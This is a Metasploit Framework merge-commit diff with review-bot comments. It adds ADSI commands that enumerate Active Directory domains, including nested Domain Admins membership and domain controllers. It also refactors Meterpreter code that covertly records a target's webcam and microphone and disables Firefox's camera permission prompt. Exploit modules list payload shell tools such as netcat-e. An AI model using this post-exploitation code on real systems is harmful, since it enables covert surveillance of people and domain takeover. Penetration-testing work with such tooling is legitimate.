Merge branch 'upstream/master' into adsi-file-output

bug/bundler_fix
OJ 2015-09-01 17:23:32 +10:00
commit 696bc95838
79 changed files with 602 additions and 5377 deletions


@ -9,7 +9,7 @@ PATH
json
metasploit-concern (= 1.0.0)
metasploit-model (= 1.0.0)
metasploit-payloads (= 1.0.9)
metasploit-payloads (= 1.0.10)
msgpack
nokogiri
packetfu (= 1.1.9)
@ -123,7 +123,7 @@ GEM
activemodel (>= 4.0.9, < 4.1.0)
activesupport (>= 4.0.9, < 4.1.0)
railties (>= 4.0.9, < 4.1.0)
metasploit-payloads (1.0.9)
metasploit-payloads (1.0.10)
metasploit_data_models (1.2.5)
activerecord (>= 4.0.9, < 4.1.0)
activesupport (>= 4.0.9, < 4.1.0)



@ -169,7 +169,7 @@
userid: 'self',
stream: stream
});
callback(stream);
});
}
@ -178,7 +178,7 @@
<body>
<div class="windowa" id="windowa">
<b>You peer</b>
<b>Your peer</b>
</div>
<div class="dot1"></div>
@ -199,4 +199,4 @@
</div>
</body>
</html>
</html>


@ -89,6 +89,7 @@ class Db
print_line " workspace [name] Switch workspace"
print_line " workspace -a [name] ... Add workspace(s)"
print_line " workspace -d [name] ... Delete workspace(s)"
print_line " workspace -D Delete all workspaces"
print_line " workspace -r <old> <new> Rename workspace"
print_line " workspace -h Show this help information"
print_line
@ -106,6 +107,8 @@ class Db
adding = true
when '-d','--del'
deleting = true
when '-D','--delete-all'
delete_all = true
when '-r','--rename'
renaming = true
else
@ -123,28 +126,9 @@ class Db
end
framework.db.workspace = workspace
elsif deleting and names
switched = false
# Delete workspaces
names.each do |name|
workspace = framework.db.find_workspace(name)
if workspace.nil?
print_error("Workspace not found: #{name}")
elsif workspace.default?
workspace.destroy
workspace = framework.db.add_workspace(name)
print_status("Deleted and recreated the default workspace")
else
# switch to the default workspace if we're about to delete the current one
if framework.db.workspace.name == workspace.name
framework.db.workspace = framework.db.default_workspace
switched = true
end
# now destroy the named workspace
workspace.destroy
print_status("Deleted workspace: #{name}")
end
end
print_status("Switched workspace: #{framework.db.workspace.name}") if switched
delete_workspaces(names)
elsif delete_all
delete_workspaces(framework.db.workspaces.map(&:name))
elsif renaming
if names.length != 2
print_error("Wrong number of arguments to rename")
@ -202,6 +186,31 @@ class Db
}
end
def delete_workspaces(names)
switched = false
# Delete workspaces
names.each do |name|
workspace = framework.db.find_workspace(name)
if workspace.nil?
print_error("Workspace not found: #{name}")
elsif workspace.default?
workspace.destroy
workspace = framework.db.add_workspace(name)
print_status("Deleted and recreated the default workspace")
else
# switch to the default workspace if we're about to delete the current one
if framework.db.workspace.name == workspace.name
framework.db.workspace = framework.db.default_workspace
switched = true
end
# now destroy the named workspace
workspace.destroy
print_status("Deleted workspace: #{name}")
end
end
print_status("Switched workspace: #{framework.db.workspace.name}") if switched
end
def cmd_workspace_tabs(str, words)
return [] unless active?
framework.db.workspaces.map { |s| s.name } if (words & ['-a','--add']).empty?
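Review bot: In `delete_workspaces`, the `workspace.default?` branch destroys the record and assigns the recreated one only to the local `workspace`, so if the default workspace was the active one, `framework.db.workspace` may still refer to the destroyed record afterwards (this assumes the accessor holds a record rather than looking it up by name, which is not visible here). The new `-D` path passes every workspace name and will normally include the default, so this branch now runs far more often. Consider capturing `was_current = framework.db.workspace.name == workspace.name` before the destroy and adding `framework.db.workspace = workspace if was_current` after `add_workspace`. Since `-D` discards all stored workspace data at once and differs from `-d` only by letter case, a confirmation prompt or a long-form-only `--delete-all` would also be worth considering.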


@ -166,9 +166,9 @@ def self.open_webrtc_browser(url='http://google.com/')
app_data = ENV['APPDATA']
paths << "#{app_data}\\Google\\Chrome\\Application\\chrome.exe"
paths.each do |p|
if File.exists?(p)
args = (p =~ /chrome\.exe/) ? "--allow-file-access-from-files" : ""
paths.each do |path|
if File.exists?(path)
args = (path =~ /chrome\.exe/) ? "--allow-file-access-from-files" : ""
system("#{path} #{args} #{url}")
found_browser = true
break
@ -188,13 +188,14 @@ def self.open_webrtc_browser(url='http://google.com/')
end
else
if defined? ENV['PATH']
['chrome', 'chromium', 'firefox', 'opera'].each do |browser|
['firefox', 'google-chrome', 'chrome', 'chromium', 'firefox', 'opera'].each do |browser|
ENV['PATH'].split(':').each do |path|
browser_path = "#{path}/#{browser}"
if File.exists?(browser_path)
args = (browser_path =~ /Chrome/) ? "--allow-file-access-from-files" : ""
system("#{browser_path} #{args} #{url} &")
found_browser = true
break
end
end
end
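Review bot: Both `system` calls build a single shell string (`system("#{path} #{args} #{url}")` and the `... &` variant), so a browser path containing spaces is split into several words and any shell metacharacter in `url` is interpreted by the shell. Passing an argument vector avoids both problems: `cmd = [path]`, `cmd << "--allow-file-access-from-files" if path =~ /chrome\.exe/`, `system(*cmd, url)`; the backgrounded Unix call would become `Process.detach(spawn(*cmd, url))`. In the new browser list `'firefox'` appears twice, and the case-sensitive `/Chrome/` test does not match the lower-case binary names `chrome` or `google-chrome` themselves, so the flag is normally not added on that path. The enclosing method starts and ends outside these hunks.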


@ -1,7 +1,5 @@
# -*- coding: binary -*-
#require 'rex/post/meterpreter/extensions/process'
module Rex
module Post
module Meterpreter
@ -15,7 +13,6 @@ module Webcam
#
###
class Webcam
include Msf::Post::Common
include Msf::Post::File
include Msf::Post::WebRTC
@ -31,9 +28,9 @@ class Webcam
def webcam_list
response = client.send_request(Packet.create_request('webcam_list'))
names = []
response.get_tlvs( TLV_TYPE_WEBCAM_NAME ).each{ |tlv|
response.get_tlvs(TLV_TYPE_WEBCAM_NAME).each do |tlv|
names << tlv.value
}
end
names
end
@ -49,11 +46,11 @@ class Webcam
request = Packet.create_request('webcam_get_frame')
request.add_tlv(TLV_TYPE_WEBCAM_QUALITY, quality)
response = client.send_request(request)
response.get_tlv( TLV_TYPE_WEBCAM_IMAGE ).value
response.get_tlv(TLV_TYPE_WEBCAM_IMAGE).value
end
def webcam_stop
client.send_request( Packet.create_request( 'webcam_stop' ) )
client.send_request(Packet.create_request('webcam_stop'))
true
end
@ -67,13 +64,13 @@ class Webcam
offerer_id = Rex::Text.rand_text_alphanumeric(10)
channel = Rex::Text.rand_text_alphanumeric(20)
remote_browser_path = get_webrtc_browser_path
remote_browser_path = webrtc_browser_path
if remote_browser_path.blank?
raise RuntimeError, "Unable to find a suitable browser on the target machine"
fail "Unable to find a suitable browser on the target machine"
end
ready_status = init_video_chat(remote_browser_path, server, channel, offerer_id)
init_video_chat(remote_browser_path, server, channel, offerer_id)
connect_video_chat(server, channel, offerer_id)
end
@ -83,40 +80,39 @@ class Webcam
request = Packet.create_request('webcam_audio_record')
request.add_tlv(TLV_TYPE_AUDIO_DURATION, duration)
response = client.send_request(request)
response.get_tlv( TLV_TYPE_AUDIO_DATA ).value
response.get_tlv(TLV_TYPE_AUDIO_DATA).value
end
attr_accessor :client
private
#
# Returns a browser path that supports WebRTC
#
# @return [String]
#
def get_webrtc_browser_path
def webrtc_browser_path
found_browser_path = ''
case client.platform
when /win/
paths = [
"Program Files\\Google\\Chrome\\Application\\chrome.exe",
"Program Files\\Mozilla Firefox\\firefox.exe"
"%ProgramFiles(x86)%\\Google\\Chrome\\Application\\chrome.exe",
"%ProgramFiles%\\Google\\Chrome\\Application\\chrome.exe",
"%ProgramW6432%\\Google\\Chrome\\Application\\chrome.exe",
"%ProgramFiles(x86)%\\Mozilla Firefox\\firefox.exe",
"%ProgramFiles%\\Mozilla Firefox\\firefox.exe",
"%ProgramW6432%\\Mozilla Firefox\\firefox.exe"
]
drive = session.sys.config.getenv("SYSTEMDRIVE")
paths = paths.map { |p| "#{drive}\\#{p}" }
# Old chrome path
user_profile = client.sys.config.getenv("USERPROFILE")
paths << "#{user_profile}\\Local Settings\\Application Data\\Google\\Chrome\\Application\\chrome.exe"
paths.each do |browser_path|
if file?(browser_path)
found_browser_path = browser_path
found_browser_path = client.fs.file.expand_path(browser_path)
break
end
end
@ -124,7 +120,7 @@ class Webcam
when /osx|bsd/
[
'/Applications/Google Chrome.app',
'/Applications/Firefox.app',
'/Applications/Firefox.app'
].each do |browser_path|
if file?(browser_path)
found_browser_path = browser_path
@ -140,7 +136,6 @@ class Webcam
found_browser_path
end
#
# Creates a video chat session as an offerer... involuntarily :-p
# Windows targets only.
@ -161,9 +156,9 @@ class Webcam
begin
write_file("#{tmp_dir}\\interface.html", interface)
write_file("#{tmp_dir}\\api.js", api)
rescue ::Exception => e
elog("webcam_chat failed. #{e.class} #{e.to_s}")
raise RuntimeError, "Unable to initialize the interface on the target machine"
rescue RuntimeError => e
elog("webcam_chat failed. #{e.class} #{e}")
raise "Unable to initialize the interface on the target machine"
end
#
@ -176,26 +171,29 @@ class Webcam
profile_name = Rex::Text.rand_text_alpha(8)
o = cmd_exec("#{remote_browser_path} --CreateProfile #{profile_name} #{tmp_dir}\\#{profile_name}")
profile_path = (o.scan(/created profile '.+' at '(.+)'/).flatten[0] || '').strip
setting = %Q|user_pref("media.navigator.permission.disabled", true);|
setting = %|user_pref("media.navigator.permission.disabled", true);|
begin
write_file(profile_path, setting)
rescue ::Exception => e
elog("webcam_chat failed: #{e.class} #{e.to_s}")
raise RuntimeError, "Unable to write the necessary setting for Firefox."
rescue RuntimeError => e
elog("webcam_chat failed: #{e.class} #{e}")
raise "Unable to write the necessary setting for Firefox."
end
args = "-p #{profile_name}"
end
exec_opts = {'Hidden' => false, 'Channelized' => false}
exec_opts = { 'Hidden' => false, 'Channelized' => false }
begin
session.sys.process.execute(remote_browser_path, "#{args} #{tmp_dir}\\interface.html", exec_opts)
rescue ::Exception => e
elog("webcam_chat failed. #{e.class} #{e.to_s}")
raise RuntimeError, "Unable to start the remote browser: #{e.message}"
rescue RuntimeError => e
elog("webcam_chat failed. #{e.class} #{e}")
raise "Unable to start the remote browser: #{e.message}"
end
end
end
end; end; end; end; end; end
end
end
end
end
end
end
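Review bot: The three rescues after the `Creates a video chat session` comment (presumably `init_video_chat`) were narrowed from `::Exception` to `RuntimeError`, so anything else raised by `write_file` or `session.sys.process.execute` now skips the `elog` call and the friendlier message and propagates to the caller. Which error classes those calls raise is not visible here, but request and I/O failures are often not `RuntimeError` subclasses, so `rescue StandardError => e` looks like the safer replacement for `::Exception`. Separately, in `webrtc_browser_path` the `%ProgramFiles%`-style entries are handed to `file?` unexpanded and `client.fs.file.expand_path` is applied only after a match; if `file?` does not expand environment variables on the remote side, none of the new paths will be found, so either confirm that or expand before the check.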


@ -26,9 +26,12 @@ class Console::CommandDispatcher::Extapi::Adsi
#
def commands
{
'adsi_user_enum' => 'Enumerate all users on the specified domain.',
'adsi_computer_enum' => 'Enumerate all computers on the specified domain.',
'adsi_domain_query' => 'Enumerate all objects on the specified domain that match a filter.'
'adsi_user_enum' => 'Enumerate all users on the specified domain.',
'adsi_group_enum' => 'Enumerate all groups on the specified domain.',
'adsi_nested_group_user_enum' => 'Recursively enumerate users who are effectively members of the group specified.',
'adsi_computer_enum' => 'Enumerate all computers on the specified domain.',
'adsi_dc_enum' => 'Enumerate all domain controllers on the specified domain.',
'adsi_domain_query' => 'Enumerate all objects on the specified domain that match a filter.'
}
end
@ -39,24 +42,68 @@ class Console::CommandDispatcher::Extapi::Adsi
'Extapi: ADSI Management'
end
#
# Options for the adsi_nested_group_user_enum command.
#
@@adsi_nested_group_user_enum_opts = Rex::Parser::Arguments.new(
'-h' => [false, 'Help banner'],
'-o' => [true, 'Path to output file.'],
'-m' => [true, 'Maximum results to return.'],
'-p' => [true, 'Result set page size.']
)
def adsi_nested_group_user_enum_usage
print_line('USAGE:')
print_line(' adsi_nested_group_user_enum <domain> <Group DN> [-h] [-m maxresults] [-p pagesize] [-o file]')
print_line
print_line('DESCRIPTION:')
print_line(' Enumerate the users who are members of the named group, taking nested groups into account.')
print_line(' For example, specifying the "Domain Admins" group DN will list all users who are effectively')
print_line(' members of the Domain Admins group, even if they are in practice members of intermediary groups.')
print_line
print_line('EXAMPLE:')
print_line(' The example below will list all members of the "Domain Admins" group on the STUFUS domain:')
print_line(' adsi_nested_group_user_enum STUFUS "CN=Domain Admins,CN=Users,DC=mwrinfosecurity,DC=com"')
print_line(@@adsi_nested_group_user_enum_opts.usage)
end
#
# Enumerate domain groups.
#
def cmd_adsi_nested_group_user_enum(*args)
args.unshift('-h') if args.length == 0
if args.include?('-h') || args.length < 2
adsi_nested_group_user_enum_usage
return true
end
domain = args.shift
groupdn = args.shift
# This OID (canonical name = LDAP_MATCHING_RULE_IN_CHAIN) will recursively search each 'memberof' parent
# https://support.microsoft.com/en-us/kb/275523 for more information -stufus
filter = "(&(objectClass=user)(memberof:1.2.840.113556.1.4.1941:=#{groupdn}))"
fields = ['samaccountname', 'name', 'distinguishedname', 'description', 'comment']
args = [domain, filter] + fields + args
return cmd_adsi_domain_query(*args)
end
#
# Options for the adsi_user_enum command.
#
@@adsi_user_enum_opts = Rex::Parser::Arguments.new(
'-h' => [false, 'Help banner'],
'-o' => [true, 'Path to output file'],
'-h' => [false, 'Help banner.'],
'-o' => [true, 'Path to output file.'],
'-m' => [true, 'Maximum results to return.'],
'-p' => [true, 'Result set page size.']
)
def adsi_user_enum_usage
print_line()
print_line('Usage: adsi_user_enum <domain> [-h] [-m maxresults] [-p pagesize] [-o file]'
print_line()
print_line('Enumerate the users on the target domain.')
print_line()
print_line('Enumeration returns information such as the user name, SAM account name, locked')
print_line('status, desc, and comment.')
print_line('USAGE:')
print_line(' adsi_user_enum <domain> [-h] [-m maxresults] [-p pagesize] [-o file]')
print_line
print_line('DESCRIPTION:')
print_line(' Enumerate all users on the target domain.')
print_line(' Enumeration returns information such as the user name, SAM account name, status, comments etc')
print_line(@@adsi_user_enum_opts.usage)
end
@ -77,23 +124,62 @@ class Console::CommandDispatcher::Extapi::Adsi
return cmd_adsi_domain_query(*args)
end
#
# Options for the adsi_group_enum command.
#
@@adsi_group_enum_opts = Rex::Parser::Arguments.new(
'-h' => [false, 'Help banner.'],
'-o' => [true, 'Path to output file.'],
'-m' => [true, 'Maximum results to return.'],
'-p' => [true, 'Result set page size.']
)
def adsi_group_enum_usage
print_line('USAGE:')
print_line(' adsi_nested_group_user_enum <domain> [-h] [-m maxresults] [-p pagesize] [-o file]')
print_line
print_line('DESCRIPTION:')
print_line(' Enumerate all groups on the target domain.')
print_line
print_line('EXAMPLE:')
print_line(' The example below will list all groups on the STUFUS domain.')
print_line(' adsi_group_enum STUFUS')
print_line(@@adsi_group_enum_opts.usage)
end
#
# Enumerate domain groups.
#
def cmd_adsi_group_enum(*args)
args.unshift('-h') if args.length == 0
if args.include?('-h')
adsi_group_enum_usage
return true
end
domain = args.shift
filter = '(objectClass=group)'
fields = ['name', 'distinguishedname', 'description',]
args = [domain, filter] + fields + args
return cmd_adsi_domain_query(*args)
end
#
# Options for the adsi_computer_enum command.
#
@@adsi_computer_enum_opts = Rex::Parser::Arguments.new(
'-h' => [false, 'Help banner'],
'-o' => [true, 'Path to output file'],
'-m' => [true, 'Maximum results to return'],
'-p' => [true, 'Result set page size']
'-h' => [false, 'Help banner.'],
'-o' => [true, 'Path to output file.'],
'-m' => [true, 'Maximum results to return.'],
'-p' => [true, 'Result set page size.']
)
def adsi_computer_enum_usage
print_line()
print_line('Usage: adsi_computer_enum <domain> [-h] [-m maxresults] [-p pagesize] [-o file]')
print_line()
print_line('Enumerate the computers on the target domain.')
print_line()
print_line('Enumeration returns information such as the computer name, desc, and comment.')
print_line('USAGE:')
print_line(' adsi_computer_enum <domain> [-h] [-m maxresults] [-p pagesize] [-o file]')
print_line
print_line('DESCRIPTION:')
print_line(' Enumerate all computers on the target domain.')
print_line(@@adsi_computer_enum_opts.usage)
end
@ -109,7 +195,47 @@ class Console::CommandDispatcher::Extapi::Adsi
domain = args.shift
filter = '(objectClass=computer)'
fields = ['name', 'distinguishedname', 'description', 'comment']
fields = ['name', 'dnshostname', 'distinguishedname', 'operatingsystem',
'operatingsystemversion', 'operatingsystemservicepack', 'description',
'comment' ]
args = [domain, filter] + fields + args
return cmd_adsi_domain_query(*args)
end
#
# Options for the adsi_dc_enum command.
#
@@adsi_dc_enum_opts = Rex::Parser::Arguments.new(
'-h' => [false, 'Help banner.'],
'-o' => [true, 'Path to output file.'],
'-m' => [true, 'Maximum results to return.'],
'-p' => [true, 'Result set page size.']
)
def adsi_dc_enum_usage
print_line('USAGE:')
print_line(' adsi_dc_enum <domain> [-h] [-m maxresults] [-p pagesize] [-o file]')
print_line
print_line('DESCRIPTION:')
print_line(' Enumerate the domain controllers on the target domain.')
print_line(@@adsi_dc_enum_opts.usage)
end
#
# Enumerate domain dcs.
#
def cmd_adsi_dc_enum(*args)
args.unshift('-h') if args.length == 0
if args.include?('-h')
adsi_dc_enum_usage
return true
end
domain = args.shift
# This LDAP filter will pull out domain controllers
filter = '(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))'
fields = ['name', 'dnshostname', 'distinguishedname', 'operatingsystem',
'operatingsystemversion', 'operatingsystemservicepack', 'description', 'comment' ]
args = [domain, filter] + fields + args
return cmd_adsi_domain_query(*args)
end
@ -118,19 +244,18 @@ class Console::CommandDispatcher::Extapi::Adsi
# Options for the adsi_domain_query command.
#
@@adsi_domain_query_opts = Rex::Parser::Arguments.new(
'-h' => [false, 'Help banner'],
'-o' => [true, 'Path to output file'],
'-m' => [true, 'Maximum results to return'],
'-p' => [true, 'Result set page size']
'-h' => [false, 'Help banner.'],
'-o' => [true, 'Path to output file.'],
'-m' => [true, 'Maximum results to return.'],
'-p' => [true, 'Result set page size.']
)
def adsi_domain_query_usage
print_line()
print_line('Usage: adsi_domain_query <domain> <filter> <field 1> [field 2 [field ..]] [-h] [-m maxresults] [-p pagesize] [-o file]')
print_line()
print_line('Enumerate the objects on the target domain.')
print_line()
print_line('Enumeration returns the set of fields that are specified.')
print_line('USAGE:')
print_line(' adsi_domain_query <domain> <filter> <field 1> [field 2 [field ..]] [-h] [-m maxresults] [-p pagesize] [-o file]')
print_line
print_line('DESCRIPTION:')
print_line(' Enumerates the objects on the target domain, returning the set of fields that are specified.')
print_line(@@adsi_domain_query_opts.usage)
end
@ -180,10 +305,10 @@ class Console::CommandDispatcher::Extapi::Adsi
table << to_table_row(c)
end
print_line()
print_line
print_line(table.to_s)
print_line("Total objects: #{objects[:results].length}")
print_line()
print_line
if output_file
::File.open(output_file, 'w') do |f|
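Review bot: `cmd_adsi_nested_group_user_enum` interpolates `groupdn` directly into the LDAP filter (`"(&(objectClass=user)(memberof:1.2.840.113556.1.4.1941:=#{groupdn}))"`), so a DN containing `(`, `)`, `*` or `\` produces a malformed filter or a different query than the one intended. Escaping the value per RFC 4515 before interpolation (`\28`, `\29`, `\2a`, `\5c`) keeps the query scoped to the named group. In the same section, `adsi_group_enum_usage` prints `adsi_nested_group_user_enum <domain> ...` as its usage line where `adsi_group_enum` is meant, and the comment above `cmd_adsi_nested_group_user_enum` still reads `Enumerate domain groups.`.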


@ -12,7 +12,6 @@ module Ui
#
###
class Console::CommandDispatcher::Stdapi::Webcam
Klass = Console::CommandDispatcher::Stdapi::Webcam
include Console::CommandDispatcher
@ -33,17 +32,16 @@ class Console::CommandDispatcher::Stdapi::Webcam
"webcam_list" => [ "webcam_list" ],
"webcam_snap" => [ "webcam_start", "webcam_get_frame", "webcam_stop" ],
"webcam_stream" => [ "webcam_start", "webcam_get_frame", "webcam_stop" ],
"record_mic" => [ "webcam_audio_record" ],
"record_mic" => [ "webcam_audio_record" ]
}
all.delete_if do |cmd, desc|
all.delete_if do |cmd, _desc|
del = false
reqs[cmd].each do |req|
next if client.commands.include? req
del = true
break
end
del
end
@ -58,23 +56,26 @@ class Console::CommandDispatcher::Stdapi::Webcam
end
def cmd_webcam_list
begin
client.webcam.webcam_list.each_with_index { |name, indx|
print_line("#{indx + 1}: #{name}")
}
return true
rescue
if client.webcam.webcam_list.length == 0
print_error("No webcams were found")
return false
return
end
client.webcam.webcam_list.each_with_index do |name, indx|
print_line("#{indx + 1}: #{name}")
end
end
def cmd_webcam_snap(*args)
if client.webcam.webcam_list.length == 0
print_error("Target does not have a webcam")
return
end
path = Rex::Text.rand_text_alpha(8) + ".jpeg"
quality = 50
view = true
index = 1
wc_list = []
webcam_snap_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help Banner" ],
@ -84,51 +85,44 @@ class Console::CommandDispatcher::Stdapi::Webcam
"-v" => [ true, "Automatically view the JPEG image (Default: '#{view}')" ]
)
webcam_snap_opts.parse( args ) { | opt, idx, val |
webcam_snap_opts.parse(args) do |opt, _idx, val|
case opt
when "-h"
print_line( "Usage: webcam_snap [options]\n" )
print_line( "Grab a frame from the specified webcam." )
print_line( webcam_snap_opts.usage )
return
when "-i"
index = val.to_i
when "-q"
quality = val.to_i
when "-p"
path = val
when "-v"
view = false if ( val =~ /^(f|n|0)/i )
when "-h"
print_line("Usage: webcam_snap [options]\n")
print_line("Grab a frame from the specified webcam.")
print_line(webcam_snap_opts.usage)
return
when "-i"
index = val.to_i
when "-q"
quality = val.to_i
when "-p"
path = val
when "-v"
view = false if val =~ /^(f|n|0)/i
end
}
begin
wc_list << client.webcam.webcam_list
rescue
end
if wc_list.length > 0
begin
print_status("Starting...")
client.webcam.webcam_start(index)
data = client.webcam.webcam_get_frame(quality)
print_good("Got frame")
ensure
client.webcam.webcam_stop
print_status("Stopped")
end
if( data )
::File.open( path, 'wb' ) do |fd|
fd.write( data )
end
path = ::File.expand_path( path )
print_line( "Webcam shot saved to: #{path}" )
Rex::Compat.open_file( path ) if view
end
return true
else
print_error("No webcams where found")
return false
begin
print_status("Starting...")
client.webcam.webcam_start(index)
webcam_started = true
data = client.webcam.webcam_get_frame(quality)
print_good("Got frame")
ensure
client.webcam.webcam_stop if webcam_started
print_status("Stopped")
end
if data
::File.open(path, 'wb') do |fd|
fd.write(data)
end
path = ::File.expand_path(path)
print_line("Webcam shot saved to: #{path}")
Rex::Compat.open_file(path) if view
end
true
end
def cmd_webcam_chat(*args)
@ -144,39 +138,42 @@ class Console::CommandDispatcher::Stdapi::Webcam
"-s" => [ false, "WebSocket server" ]
)
webcam_chat_opts.parse( args ) { | opt, idx, val |
webcam_chat_opts.parse(args) do |opt, _idx, val|
case opt
when "-h"
print_line( "Usage: webcam_chat [options]\n" )
print_line( "Starts a video conversation with your target." )
print_line( "Browser Requirements:")
print_line( "Chrome: version 23 or newer" )
print_line( "Firefox: version 22 or newer" )
print_line( webcam_chat_opts.usage )
return
when "-s"
server = val.to_s
when "-h"
print_line("Usage: webcam_chat [options]\n")
print_line("Starts a video conversation with your target.")
print_line("Browser Requirements:")
print_line("Chrome: version 23 or newer")
print_line("Firefox: version 22 or newer")
print_line(webcam_chat_opts.usage)
return
when "-s"
server = val.to_s
end
}
end
begin
print_status("Webcam chat session initialized.")
client.webcam.webcam_chat(server)
rescue RuntimeError => e
rescue RuntimeError => e
print_error(e.message)
end
end
def cmd_webcam_stream(*args)
if client.webcam.webcam_list.length == 0
print_error("Target does not have a webcam")
return
end
print_status("Starting...")
stream_path = Rex::Text.rand_text_alpha(8) + ".jpeg"
stream_path = Rex::Text.rand_text_alpha(8) + ".jpeg"
player_path = Rex::Text.rand_text_alpha(8) + ".html"
duration = 1800
quality = 50
view = true
index = 1
wc_list = []
webcam_snap_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help Banner" ],
@ -188,30 +185,30 @@ class Console::CommandDispatcher::Stdapi::Webcam
"-v" => [ true, "Automatically view the stream (Default: '#{view}')" ]
)
webcam_snap_opts.parse( args ) { | opt, idx, val |
webcam_snap_opts.parse(args) do |opt, _idx, val|
case opt
when "-h"
print_line( "Usage: webcam_stream [options]\n" )
print_line( "Stream from the specified webcam." )
print_line( webcam_snap_opts.usage )
return
when "-d"
duration = val.to_i
when "-i"
index = val.to_i
when "-q"
quality = val.to_i
when "-s"
stream_path = val
when "-t"
player_path = val
when "-v"
view = false if ( val =~ /^(f|n|0)/i )
when "-h"
print_line("Usage: webcam_stream [options]\n")
print_line("Stream from the specified webcam.")
print_line(webcam_snap_opts.usage)
return
when "-d"
duration = val.to_i
when "-i"
index = val.to_i
when "-q"
quality = val.to_i
when "-s"
stream_path = val
when "-t"
player_path = val
when "-v"
view = false if val =~ /^(f|n|0)/i
end
}
end
print_status("Preparing player...")
html = %Q|<html>
html = %|<html>
<head>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
@ -264,7 +261,7 @@ Status : <span id="status"></span>
end
if view
print_status("Opening player at: #{player_path}")
Rex::Compat.open_file(player_path)
Rex::Compat.open_file(player_path)
else
print_status("Please open the player manually with a browser: #{player_path}")
end
@ -272,72 +269,70 @@ Status : <span id="status"></span>
print_status("Streaming...")
begin
client.webcam.webcam_start(index)
::Timeout.timeout(duration) {
webcam_started = true
::Timeout.timeout(duration) do
while client do
data = client.webcam.webcam_get_frame(quality)
if data
::File.open(stream_path, 'wb') do |f|
f.write(data)
f.write(data)
end
data = nil
end
end
}
end
rescue ::Timeout::Error
ensure
client.webcam.webcam_stop
client.webcam.webcam_stop if webcam_started
end
print_status("Stopped")
end
def cmd_record_mic(*args)
path = Rex::Text.rand_text_alpha(8) + ".wav"
play = true
duration = 1
path = Rex::Text.rand_text_alpha(8) + ".wav"
play = true
duration = 1
record_mic_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help Banner" ],
"-d" => [ true, "Number of seconds to record (Default: 1)" ],
"-f" => [ true, "The wav file path (Default: '#{::File.expand_path( "[randomname].wav" )}')" ],
"-f" => [ true, "The wav file path (Default: '#{::File.expand_path('[randomname].wav')}')" ],
"-p" => [ true, "Automatically play the captured audio (Default: '#{play}')" ]
)
record_mic_opts.parse( args ) { | opt, idx, val |
record_mic_opts.parse(args) do |opt, _idx, val|
case opt
when "-h"
print_line( "Usage: record_mic [options]\n" )
print_line( "Records audio from the default microphone." )
print_line( record_mic_opts.usage )
return
when "-d"
duration = val.to_i
when "-f"
path = val
when "-p"
play = false if ( val =~ /^(f|n|0)/i )
when "-h"
print_line("Usage: record_mic [options]\n")
print_line("Records audio from the default microphone.")
print_line(record_mic_opts.usage)
return
when "-d"
duration = val.to_i
when "-f"
path = val
when "-p"
play = false if val =~ /^(f|n|0)/i
end
}
end
print_status("Starting...")
data = client.webcam.record_mic(duration)
print_status("Stopped")
if( data )
::File.open( path, 'wb' ) do |fd|
fd.write( data )
if data
::File.open(path, 'wb') do |fd|
fd.write(data)
end
path = ::File.expand_path( path )
print_line( "Audio saved to: #{path}" )
Rex::Compat.play_sound( path ) if play
path = ::File.expand_path(path)
print_line("Audio saved to: #{path}")
Rex::Compat.play_sound(path) if play
end
return true
true
end
end
end
end
end
end
end
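Review bot: `cmd_webcam_snap` and `cmd_webcam_stream` now call `client.webcam.webcam_list` before parsing options, so `-h` on a session without a camera prints `Target does not have a webcam` instead of the help text, and every invocation costs an extra request. `cmd_webcam_list` calls `webcam_list` twice and no longer has a `rescue`, so a failed request surfaces as an exception rather than `No webcams were found`; fetching once with `names = client.webcam.webcam_list` and testing `names.empty?` would halve the round-trips. The `-i` index is also passed to `webcam_start` without being checked against the list that was just fetched. In the `ensure` of `cmd_webcam_snap`, `print_status("Stopped")` still runs when `webcam_started` was never set.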


@ -61,7 +61,7 @@ Gem::Specification.new do |spec|
# are needed when there's no database
spec.add_runtime_dependency 'metasploit-model', '1.0.0'
# Needed for Meterpreter
spec.add_runtime_dependency 'metasploit-payloads', '1.0.9'
spec.add_runtime_dependency 'metasploit-payloads', '1.0.10'
# Needed by msfgui and other rpc components
spec.add_runtime_dependency 'msgpack'
# Needed by anemone crawler


@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl bash telnet',
'RequiredCmd' => 'generic perl telnet',
}
},
'Targets' =>


@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet python perl bash gawk netcat netcat-e ruby php openssl',
'RequiredCmd' => 'generic telnet python perl gawk netcat netcat-e ruby php openssl',
}
},
'Targets' =>


@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl python gawk bash-tcp netcat'
'RequiredCmd' => 'generic perl python gawk netcat'
}
},
'Targets' =>


@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet python perl bash',
'RequiredCmd' => 'generic telnet python perl',
}
},
'Targets' =>


@ -38,7 +38,7 @@ class Metasploit4 < Msf::Exploit::Remote
'DisableNops' => true,
'Compat' => {
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic netcat perl ruby python bash telnet'
'RequiredCmd' => 'generic netcat perl ruby python telnet'
}
},
'Platform' => %w( unix ),


@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl bash telnet'
'RequiredCmd' => 'generic perl telnet'
}
},
'Platform' => ['unix'],


@ -44,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic netcat netcat-e perl bash',
'RequiredCmd' => 'generic netcat netcat-e perl',
}
},
'Targets' =>


@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic python perl bash',
'RequiredCmd' => 'generic python perl',
},
'Targets' =>
[


@ -51,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
